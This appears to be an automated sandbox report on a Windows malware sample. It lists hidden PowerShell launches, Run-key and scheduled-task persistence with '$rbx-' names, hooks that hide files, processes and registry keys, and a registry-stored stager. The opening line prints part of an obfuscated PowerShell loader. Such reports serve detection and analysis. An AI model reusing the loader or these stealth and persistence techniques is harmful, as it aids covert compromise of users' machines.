Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\cmd.exe

Code function: 19_2_0000022413901E3C LoadLibraryA,GetProcAddress,SleepEx,

19_2_0000022413901E3C

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\cmd.exe	Code function: 19_3_00000224138EA7DD push rcx; retf 003Fh	19_3_00000224138EA7DE
Source: C:\Windows\System32\conhost.exe	Code function: 20_3_000002BCD7E1A7DD push rcx; retf 003Fh	20_3_000002BCD7E1A7DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B8B23FB pushad ; retf	36_2_00007FFD9B8B2411
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98BFFE push eax; retf	36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98B7F8 push eax; retf	36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98C829 push ds; retf	36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98BF5F push eax; retf	36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98C749 push ds; retf	36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98BE69 push eax; retf	36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98CA5F push ds; retf	36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98BD89 push eax; retf	36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98C9BE push ds; retf	36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98C1DA push ds; retf	36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98C1A0 push eax; retf	36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98C91F push ds; retf	36_2_00007FFD9B98CB79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFD9B98C09F push eax; retf	36_2_00007FFD9B98C1D9
Source: C:\Windows\System32\conhost.exe	Code function: 37_3_0000026504E8A7DD push rcx; retf 003Fh	37_3_0000026504E8A7DE
Source: C:\Windows\System32\dllhost.exe	Code function: 38_3_0000025DC1AAA7DD push rcx; retf 003Fh	38_3_0000025DC1AAA7DE
Source: C:\Windows\System32\winlogon.exe	Code function: 39_3_00000225DC62A7DD push rcx; retf 003Fh	39_3_00000225DC62A7DE
Source: C:\Windows\System32\lsass.exe	Code function: 40_3_00000202C0ACA7DD push rcx; retf 003Fh	40_3_00000202C0ACA7DE
Source: C:\Windows\System32\svchost.exe	Code function: 41_3_000002A6612EA7DD push rcx; retf 003Fh	41_3_000002A6612EA7DE
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAEDCA7DD push rcx; retf 003Fh	42_3_000002BAAEDCA7DE
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAED9A7DD push rcx; retf 003Fh	42_3_000002BAAED9A7DE
Source: C:\Windows\System32\svchost.exe	Code function: 43_3_0000026A879AA7DD push rcx; retf 003Fh	43_3_0000026A879AA7DE
Source: C:\Windows\System32\svchost.exe	Code function: 44_3_000001795378A7DD push rcx; retf 003Fh	44_3_000001795378A7DE
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_3_0000016CE5E3A7DD push rcx; retf 003Fh	45_3_0000016CE5E3A7DE
Source: C:\Windows\System32\svchost.exe	Code function: 46_3_000002295D54A7DD push rcx; retf 003Fh	46_3_000002295D54A7DE

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Creates autostart registry keys with suspicious names

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F

Creates job files (autostart)

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\System32\Tasks\$rbx-QgS1M4PT

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Stores large binary data to the registry

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
